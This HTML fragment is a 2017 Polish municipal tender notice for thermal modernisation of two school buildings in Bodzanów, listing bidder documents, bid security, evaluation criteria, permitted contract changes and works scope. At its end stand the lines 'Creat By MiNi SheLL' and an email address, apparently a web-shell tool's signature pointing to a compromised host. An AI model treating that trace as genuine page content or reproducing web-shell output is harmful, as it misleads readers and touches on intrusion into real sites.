              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1.Wykaz robót wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane oraz załączeniem dowodów (dokumentów) określających, czy wskazane w wykazie ww. roboty zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami o których mowa są referencje bądź inne dokumenty wystawione przez podmiot na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty. W przypadku składania oferty wspólnej Wykonawcy składają zgodnie z wyborem jeden wspólny wykaz lub oddzielne wykazy. Warunek zostanie uznany za spełniony, jeśli Wykonawcy składający ofertę wspólną będą spełniać go łącznie. Wykaz powinien zawierać dane zawarte we wzorze stanowiące załącznik nr 4 do siwz;
2.Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - Wykaz powinien zawierać dane zawarte we wzorze stanowiące załącznik nr 5  do siwz.
3.Dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę określoną przez zamawiającego.


<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Wykonawcy obowiązani są dołączyć do oferty dokument pełnomocnictwa (zgodnie 
z art. 23 ust. 2 ustawy - Pzp) w przypadku, gdy o udzielenie zamówienia ubiega się wspólnie kilku Wykonawców, o zakresie, co najmniej: do reprezentowania w postępowaniu o udzielenie zamówienia Wykonawców wspólnie ubiegających się o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.Wymagane wadium określono w stosunku do wartości zamówienia:
- dla zadania I  w wysokości - 7 000,00 zł (słownie: siedem tysięcy zł. );
- dla zadanie II w wysokości - 16 900,00 zł. (słownie: szesnaście tysięcy dziewięćset zł.).
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
a)  pieniądzu na konto Zamawiającego: na rachunek bankowy Urzędu Gminy Bodzanów,  VISTULA BS Oddział Wyszogród nr 09 9011 0005 0970 0547 2000 0200, z dopiskiem w tytule przelewu: Wadium  do przetargu nr RI.271.60.2017  na zamówienie pn. Termomodernizacja budynków użyteczności publicznej zlokalizowanych na terenie Gmin Związku Gmin Regionu Płockiego - zadanie I i zadanie II*);
*)niewłaściwe skreślić
b) poręczeń bankowych lub poręczeń spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancji bankowych; 
d) gwarancji ubezpieczeniowych; 
e) poręczeń udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy 
z 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014 r. poz. 1804 oraz z 2015 r. poz. 978 i 1240). 
3.Wadium wnosi się przed upływem terminu składania ofert, w szczególności wadium 
w formie pieniężnej winno wpłynąć na konto Zamawiającego przed upływem terminu składania ofert. 
4.W przypadku wnoszenia wadium w innej formie niż pieniężna, Wykonawca dołącza do oferty oryginalny dokument wadialny. Z postępowania o udzielenie zamówienia publicznego wyklucza się Wykonawców, którzy nie wniosą wadium przed upływem terminu składania ofert.
5.Wadium wniesione w formie innej niż pieniężna winno obowiązywać od dnia składania ofert (a nie od dnia następnego) przez cały okres związania ofertą, zgodnie z art. 85 ustawy Pzp.
6.W przypadku, gdy Wykonawca wnosi wadium w formie gwarancji bankowej lub gwarancji ubezpieczeniowej z treści tych gwarancji musi w szczególności jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium zawierające oświadczenie, że zapłaci całą kwotę wadium w przypadku zaistnienia okoliczności, o którym mowa w art. 46 ust 4a i 5 ustawy Pzp.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający dopuszcza zmiany umowy w przypadkach określonych w art. 144 ust 1 pkt. 2-6 Prawa zamówień publicznych oraz przewiduje możliwość dokonania w umowie następujących istotnych zmian:
a)wynagrodzenia w przypadku ustawowej zmiany podatku VAT, a także w przypadku wystąpienia robót zamiennych i/lub zaniechanych, i/lub dodatkowych,
b)terminu wykonania przedmiotu umowy w przypadku zlecenia wykonania robót, o których mowa w § 5 ust 6 , 7 lub 8 umowy,
c)terminu wykonania przedmiotu umowy w przypadku zmiany umowy dokonanej zgodnie z art. 144 ust 1 pkt. 3 lub 6 ustawy Pzp,
d)terminu wykonania przedmiotu umowy, w przypadku wystąpienia przeszkody o obiektywnym charakterze (zdarzenia nadzwyczajne, zewnętrzne i niemożliwe do zapobieżenia, a więc mieszczące się w zakresie pojęciowym tzw. siły wyższej) i inne zdarzenia, których przyczyny nie leżą po żadnej ze stron umowy, takie jak: nadzwyczajne zjawiska przyrody (m.in. trzęsienia ziemi, huragany) zdarzenia wywołane przez człowieka, (np. działania wojenne, gwałtowne rozruchy oraz akty władzy publicznej), którym należy się podporządkować, a także inne niemożliwe do przewidzenia przyczyny techniczne,
e)wystąpienie niekorzystnych warunków atmosferycznych uniemożliwiających wykonanie robót.
f)treści umowy § 7 ust 2 dotyczących wpisania lub zmiany podwykonawstwa w przypadkach gdy Wykonawca dokona prawidłowego zgłoszenia lub zmiany podwykonawców w zakresie zgodnym ze SIWZ i umową.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 19/04/2017, godzina: 13:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Zadanie I - Budynek Gimnazjum<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie I - Budynek Gimnazjum
Zakres robót obejmuje m.in.: 
1. Ściany fundamentowe
odkopanie ścian piwnicznych i ławy fundamentowej, oczyszczenie podłoża, wykonanie napraw, usunięcie i uzupełnienie starych odsłoniętych tynków, wykonanie dwuwarstwowej  hydroizolacji bitumiczno-polimerowej ścian piwnic do poziomu terenu,
ocieplenie ścian fundamentowych i cokołu styropianem 
o podwyższonej odporności na  wilgoć i korozję biologiczną gr 8cm, zabezpieczenie podziemnej części ściany fundamentowej folią kubełkową, wykonanie tynku mozaikowego drobnoziarnistego z mikką na cokole ponad poziomem terenu oraz zabezpieczenie powłoką anty grafitti.
2. Ściany zewnętrzne powyżej cokołu
ocieplenie ścian nadziemia styropian grafitowy gr. 8cm, wykonanie napraw 
i usunięcie i uzupełnienie starych odspojonych tynków, wzmocnienie izolacji termicznej powyżej cokołu do wysokości 2,0 m zaprawą klejowo-szpachlową z zatopioną  siatką z włókna szklanego oraz siatką wraz z zabezpieczeniem powłoką anty grafitti, na wysokości powyżej 2,0 m standardowa zaprawa klejowo-szpachlowa z zatopioną  siatką z włókna szklanego, wykonanie cienkowarstwowego tynku strukturalnego silikonowego 
3. Docieplenie stropu nad ostatnią kondygnacją 
docieplenie poddasza nieużytkowego wełną mineralną gr. 19 cm na folii paroizolacyjnej ułożonej na stropie oraz wykonanie ślepej podłogi z desek gr. 25mm na legarach 
4. Docieplenie dachu nad wiatrołapem
demontaż i ponowny montaż podbitki z listew drewnianych  17,0m2, docieplenie sufitu wełną mineralną gr. 17 cm 
5. Prace ogólnobudowlane  remontowe budynku
wymiana obróbek blacharskich, rynien i rur spustowych, parapetów zewnętrznych (blacha cynkowo-tytanowa gr. 0,7mm), wymiana stolarki okiennej PVC  szt. 7, współczynnik przenikania ciepła, remont pochylni zewnętrznej, rozbiórka i ułożenie chodnika z kostki, wymiana opaski obwodowej budynku z płyt betonowych na kostkę, montaż nawiewników higrosterowalnych.
6. Roboty elektryczne
montaż instalacji fotowoltaicznej na potrzeby oświetlenia zewnętrznego wraz z wymianą opraw, wymiana opraw oświetlenia wewnętrznego, wykonanie instalacji odgromowej nowe odprowadzenia pionowe, montaż systemu monitoringu mediów obiektu z możliwością powiadamiania
7. Roboty instalacyjne
wykonanie układu pomiarowego dla potrzeb c.o.,  zabezpieczenie antykorozyjne rurociągów, podpór i uchwytów, wykonanie izolacji termicznej rurociągów, regulacja hydrauliczna instalacji c. o. (montaż nowych głowic do zaworów termostatycznych), wymiana uszkodzonych grzejników. 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45321000-3, 45311000-3,
                    45330000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  415982.12<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/10/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Zadanie II - Budynek Szkoły Podstawowej wraz z salą gimnastyczną<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie II - Budynek Szkoły Podstawowej wraz z salą gimnastyczną
Zakres robót obejmuje m.in.: 
1. Ściany fundamentowe
odkopanie ścian piwnicznych i ławy fundamentowej, oczyszczenie podłoża, wykonanie napraw, usunięcie i uzupełnienie starych odsłoniętych tynków, wykonanie dwuwarstwowej  hydroizolacji bitumiczno-polimerowej ścian piwnic do poziomu terenu, ocieplenie ścian fundamentowych i cokołu styropianem gr 13cm, o podwyższonej odporności na  wilgoć i korozję biologiczną, zabezpieczenie podziemnej części ściany fundamentowej folią kubełkową, wykonanie tynku mozaikowego drobnoziarnistego z mikką na cokole ponad poziomem terenu oraz zabezpieczenie powłoką anty grafitti.
2. Ściany zewnętrzne powyżej cokołu
wymiana stolarki okiennej PVC  szt. 3 i aluminiowych  szt. 3, współczynnik przenikania ciepła, ocieplenie ścian nadziemia styropian grafitowy gr. 14cm o pow., wykonanie napraw, usunięcie i uzupełnienie starych odspojonych tynków, wzmocnienie izolacji termicznej powyżej cokołu do wysokości 2,0 m zaprawą klejowo-szpachlową z zatopioną  siatką z włókna szklanego oraz siatką wraz z zabezpieczeniem powłoką anty grafitti, na wysokości powyżej 2,0 m standardowa zaprawa klejowo-szpachlowa z zatopioną siatką z włókna szklanego, wykonanie cienkowarstwowego tynku strukturalnego silikonowego 
3. Docieplenie stropu nad ostatnią kondygnacją 
a) nad częścią główną budynku i nad salą gimnastyczną
docieplenie poddasza nieużytkowego wełną mineralną gr. 19 cm na folii paroizolacyjnej ułożonej na stropie, wykonanie ślepej podłogi  (nad częścią główną budynku) z desek gr. 25mm na legarach 
b) nad łącznikiem
docieplenie poddasza nieużytkowego wełną mineralną gr. 17 cm na folii paroizolacyjnej ułożonej na stropie 
4. Wymiana pokrycia dachu
wymiana pokrycia z papy bitumicznej  na bachodachówkę oraz  wymiana blachy trapezowej nad łącznikiem na blachodachówkę  łączna powierzchnia dachów 
5. Prace ogólnobudowlane  remontowe budynku
wymiana obróbek blacharskich, rynien i rur spustowych, parapetów zewnętrznych (blacha cynkowo-tytanowa gr. 0,7mm), wymiana stolarki okiennej PVC  szt 3 i aluminiowych  
szt 3, współczynnik przenikania ciepła, remont schodów i pochylni zewnętrznej z montażem balustrad, rozbiórka i ułożenie chodnika z kostki, wymiana opaski obwodowej budynku z płyt betonowych na kostkę,
6. Roboty elektryczne
montaż instalacji fotowoltaicznej na potrzeby oświetlenia zewnętrznego, wykonaniem instalacji oświetlenia zewnętrznego z wymianą opraw, częściowa wymiana opraw oświetlenia wewnętrznego, wykonanie nowej instalacji odgromowej, montaż systemu monitoringu mediów obiektu z możliwością powiadamiania
7. Roboty instalacyjne
wykonanie układu pomiarowego dla potrzeb c.o., zabezpieczenie antykorozyjne rurociągów, podpór i uchwytów, wykonanie izolacji termicznej rurociągów, regulacja hydrauliczna instalacji c.o. (montaż nowych głowic do zaworów termostatycznych), wymiana uszkodzonych grzejników 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45321000-3, 45311000-3,
                    45330000-9,
                    45260000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  993792.42<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/10/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com